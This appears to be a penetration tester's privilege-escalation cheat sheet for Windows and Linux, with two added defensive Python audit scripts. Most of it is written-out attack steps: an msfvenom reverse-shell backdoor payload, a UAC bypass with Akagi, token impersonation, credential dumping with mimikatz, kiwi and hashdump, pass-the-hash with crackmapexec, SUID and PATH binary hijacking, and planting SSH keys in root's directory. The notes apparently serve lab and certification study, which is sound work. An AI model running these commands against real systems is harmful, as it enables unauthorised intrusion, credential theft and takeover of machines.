Privilege Escalation
Windows
Note: if you have a valid user credential you can authenticate to a Windows target over SMB, RDP or WinRM.
Automation script
https://github.com/itm4n/PrivescCheck: useful for gathering information
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Run it from a command prompt.
UAC Bypass
User Account Control (UAC) is a feature that enables a consent prompt for elevated activities.
Prerequisites:
User must be a member of the Administrators group.
net localgroup administrators
Full interactive shell with the victim (a common nc.exe shell is not enough).
You can use meterpreter
Metasploit
search module bypassuac ...
UACME
If the target architecture is x64 it's better to use an x64 meterpreter, or to migrate into an x64 process running in session 1 (see the SESSION column of ps).
ps
to list processes (ex. migrate <PID explorer.exe>)
Upload Akagi (Akagi64.exe if x64)
Create payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o backdoor.exe
Use exploit/multi/handler to start a listener
Akagi64.exe 23 <payload_full_path>
NOTE: use the full path to the payload.
Once run, we get a meterpreter session; use getprivs/getsystem to obtain elevated privileges.
Impersonate Tokens
With msfconsole:
load incognito
list_tokens -u
impersonate_token <token_name>
impersonate_token ATTACKDEFENSE\\Administrator
NOTE: the two backslashes
You may need to migrate to a process owned by the target <user>.
Ex.
getpid
Current pid: 2628
ps
PID: 2948 | PPID: 2036 NAME: explorer.exe | ARCH: X64 | SESSION:1 | USER: ANTHING\Administrator | PATH: C:\Windows\explorer.exe
migrate 2948
getpid
Current pid: 2948
Of course you can repeat the process to become NT AUTHORITY\SYSTEM.
Password in configuration file (Unattend.xml)
An answer file is an XML-based file that contains setting definitions and values to use during Windows Setup. Answer files (or Unattend files) are used by Administrators when they are setting up fresh images as it allows for an automated setup for Windows systems.
Extract the password value from the file and base64-decode it.
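Since the answer-file encoding is only base64 over UTF-16LE text (Windows Setup appends the element name, "Password" or "AdministratorPassword", before encoding), here is an added Python audit script, not part of the original notes, that parses an unattend.xml, recovers every embedded credential and returns it so leftover answer files can be found and cleaned up. The sample file, its credentials and the encode helper that builds it are constructed for the demo.

```python
import base64
import xml.etree.ElementTree as ET

# Element names whose <Value> holds a credential. Windows Setup appends the
# element name to the password before base64-encoding the UTF-16LE bytes.
PASSWORD_ELEMENTS = ("Password", "AdministratorPassword")

def encode_unattend_password(password, element):
    """Reproduce the encoding used when <PlainText>false</PlainText> (builds the sample)."""
    return base64.b64encode((password + element).encode("utf-16-le")).decode("ascii")

def decode_unattend_password(value, element):
    """Base64-decode a non-plaintext value and strip the appended element name."""
    text = base64.b64decode(value).decode("utf-16-le")
    return text[: -len(element)] if text.endswith(element) else text

def _child_text(elem, name):
    # Namespace-agnostic lookup of a direct child's text (real files use a default xmlns)
    for child in elem:
        if child.tag.split("}")[-1] == name:
            return (child.text or "").strip()
    return None

def find_embedded_passwords(xml_text):
    """Return [(element, recovered_password)] for every credential left in an answer file."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        tag = elem.tag.split("}")[-1]
        value = _child_text(elem, "Value") if tag in PASSWORD_ELEMENTS else None
        if not value:
            continue
        plaintext = (_child_text(elem, "PlainText") or "false").lower() == "true"
        findings.append((tag, value if plaintext else decode_unattend_password(value, tag)))
    return findings

# Constructed sample answer file (hypothetical host, made-up credentials)
SAMPLE_UNATTEND = (
    '<unattend xmlns="urn:schemas-microsoft-com:unattend"><settings pass="oobeSystem">'
    '<component name="Microsoft-Windows-Shell-Setup"><AutoLogon><Password><Value>'
    + encode_unattend_password("Autumn2023!", "Password")
    + "</Value><PlainText>false</PlainText></Password><Username>Administrator</Username>"
    "</AutoLogon><UserAccounts><AdministratorPassword><Value>"
    + encode_unattend_password("L0calAdm1n", "AdministratorPassword")
    + "</Value><PlainText>false</PlainText></AdministratorPassword></UserAccounts>"
    "</component></settings></unattend>"
)

if __name__ == "__main__":
    for element, secret in find_embedded_passwords(SAMPLE_UNATTEND):
        print(f"{element}: credential recoverable (length {len(secret)}), remove this file")
```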
Credential Dumping (Mimikatz - Kiwi - Hashdump)
Prerequisites: the user must be a member of the local Administrators group.
hashdump (Metasploit - Meterpreter)
You may need to migrate meterpreter to an NT AUTHORITY\SYSTEM process (ex. migrate <PID explorer.exe>), then:
hashdump
Kiwi (Metasploit - Meterpreter)
You may need to migrate meterpreter to an NT AUTHORITY\SYSTEM process (ex. migrate <PID explorer.exe>), then:
load kiwi
creds_all
: retrieve all credentials (parsed)
lsa_dump_sam
: NTLM hashes for all of the user accounts on the system
lsa_dump_secrets
: to find the clear text passwords
However, from Windows 8.0 onward, Windows does not store plaintext passwords, so this is only helpful on older Windows versions.
Mimikatz
upload mimikatz.exe
.\mimikatz.exe
privilege::debug
: should return Privilege '20' OK. This should be standard practice when running mimikatz, as it needs local administrator access
lsadump::sam
: NTLM hashes for all of the user accounts on the system
sekurlsa::logonpasswords
: to find the clear text passwords, but it's not always possible
Pass the Hash
crackmapexec smb <ip> -u <administrator> -H <NTLM hash> -x "ipconfig"
Metasploit: windows/smb/psexec, with SMBPass set to
<LM hash>:<NTLM hash>
An empty LM hash is AAD3B435B51404EEAAD3B435B51404EE (meaning LM is not in use), so the value becomes
AAD3B435B51404EEAAD3B435B51404EE:<NTLM hash>
The hashdump output is already in the right format.
Other
Powershell History
Saved Windows Credentials
cmdkey /list
runas /savecred /user:admin cmd.exe
Scheduled Tasks
Insecure Permissions on Service Executable
Unquoted Service Paths
Insecure Service Permissions
Windows Privileges
Unpatched Software
Linux
Vulnerable program
Look for scripts that execute programs, and for programs themselves, running with elevated privileges, and check whether any of them is a vulnerable version. One example: chkrootkit v0.49 (running as root)
ps aux
Weak Permissions
find / -not -type l -perm -o+w
: world-writable files. Example: maybe you can edit the shadow file...
Sudo
sudo -l
Search GTFOBins for how to exploit the allowed binaries.
SUID - custom binary
Premise: you have binary_name (with SUID set) that uses/loads/executes loaded_binary.
Extract strings from the binary – look for shared libraries or binaries being loaded / executed at runtime
strings binary_name
Method 1
cp /bin/bash /path/to/loaded_binary
Method 2
Delete the loaded binary and replace it with a new one:
gcc binary.c -o <loaded_binary>
: compile
./binary_name
: run the binary
Other
sudo -l
setenv?
SUID/GUID
Look for capabilities
History Files
Docker group
Cron jobs
SSH Keys
PATH
NFS
Writable /etc/shadow
Writable /etc/passwd
Are there scripts that use commands? If a command is executed without its full path, you can modify the PATH variable.
strings <program_name>
If you see, for example:
tail -f /var/log/nginx/access.log
then:
chmod +x /tmp/tail
export PATH=/tmp:$PATH
./<program_name>
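To check a privileged binary for the two hijack conditions described in the SUID custom binary section and in the PATH section above (helper binaries living under writable paths, and commands invoked without a full path), here is an added Python audit example, not from the original notes. The sample `strings` output, the hypothetical `/home/deploy/bin/loaded_binary` path and the `writable` callback used for testing are constructed for the demo.

```python
import os
import re

# A string whose first token is a bare command name (no slash), e.g.
# "tail -f /var/log/nginx/access.log"; such a command is resolved through PATH
CMD_RE = re.compile(r"^[A-Za-z][\w.-]*(\s|$)")
# A string that is a single absolute path (helper binary, shared library, config)
ABS_PATH_RE = re.compile(r"^/[\w./-]+$")

def audit_binary_strings(strings, known_commands, writable=None):
    """Flag strings from a SUID/root-run binary that an unprivileged user could hijack.

    Returns {"unqualified": command lines resolved through PATH,
             "writable_paths": absolute paths whose file or parent directory is writable}.
    """
    if writable is None:  # default: can the current user modify the file or replace it?
        writable = lambda p: os.access(p, os.W_OK) or os.access(os.path.dirname(p), os.W_OK)
    report = {"unqualified": [], "writable_paths": []}
    for s in (x.strip() for x in strings):
        if ABS_PATH_RE.match(s):
            if writable(s):
                report["writable_paths"].append(s)
        elif CMD_RE.match(s) and s.split()[0] in known_commands:
            report["unqualified"].append(s)
    return report

def risky_path_entries(path_env, writable=None):
    """PATH entries an unprivileged user controls: empty, relative or writable directories."""
    if writable is None:
        writable = lambda d: os.access(d, os.W_OK)
    return [e for e in path_env.split(os.pathsep)
            if e == "" or not os.path.isabs(e) or writable(e)]

# Constructed sample of `strings` output from a hypothetical SUID binary
SAMPLE_STRINGS = [
    "/lib64/ld-linux-x86-64.so.2",
    "GLIBC_2.2.5",
    "tail -f /var/log/nginx/access.log",  # bare "tail": PATH-dependent
    "/usr/bin/systemctl restart nginx",    # fully qualified: not PATH-dependent
    "/home/deploy/bin/loaded_binary",      # helper living under a user-writable directory
    "usage: %s [file]",
]

if __name__ == "__main__":
    print(audit_binary_strings(SAMPLE_STRINGS, {"tail", "cat", "sh"}))
    print(risky_path_entries("/tmp:" + os.environ.get("PATH", "")))
```

Run against a real binary with `strings <program_name>` piped in and the default `writable` check; any entry in either list (or a risky PATH entry such as /tmp ahead of /usr/bin) is a finding to fix by using absolute paths and root-owned directories.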
Is there a database? Can I access it?
Look at config file or source code of webpages connecting to db
Look at the source code of the php, py, jsp ... files of the website, especially login files. Any password?
Writable .ssh folder / authorized_keys file?
generate new ssh keys
Can I read some file with sudo?
/root/root.txt, /etc/shadow, /root/.ssh/id_rsa
Can I write a file in the root user directory?
generate ssh key with ssh-keygen and save it in the root user dir
Kernel Exploits
Linpeas.sh
Resource
juggernaut-sec.com/blog/: Windows/Linux privesc and Active Directory hacking
gtfobins.github.io: GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
github.com/carlospolop/PEASS-ng/tree/master/linPEAS: Linux Privilege Escalation Awesome Script
github.com/DominicBreuker/pspy: monitor Linux processes without root permissions
github.com/gtworek/Priv2Admin: Windows OS privileges that lead to admin (see Windows Privileges above)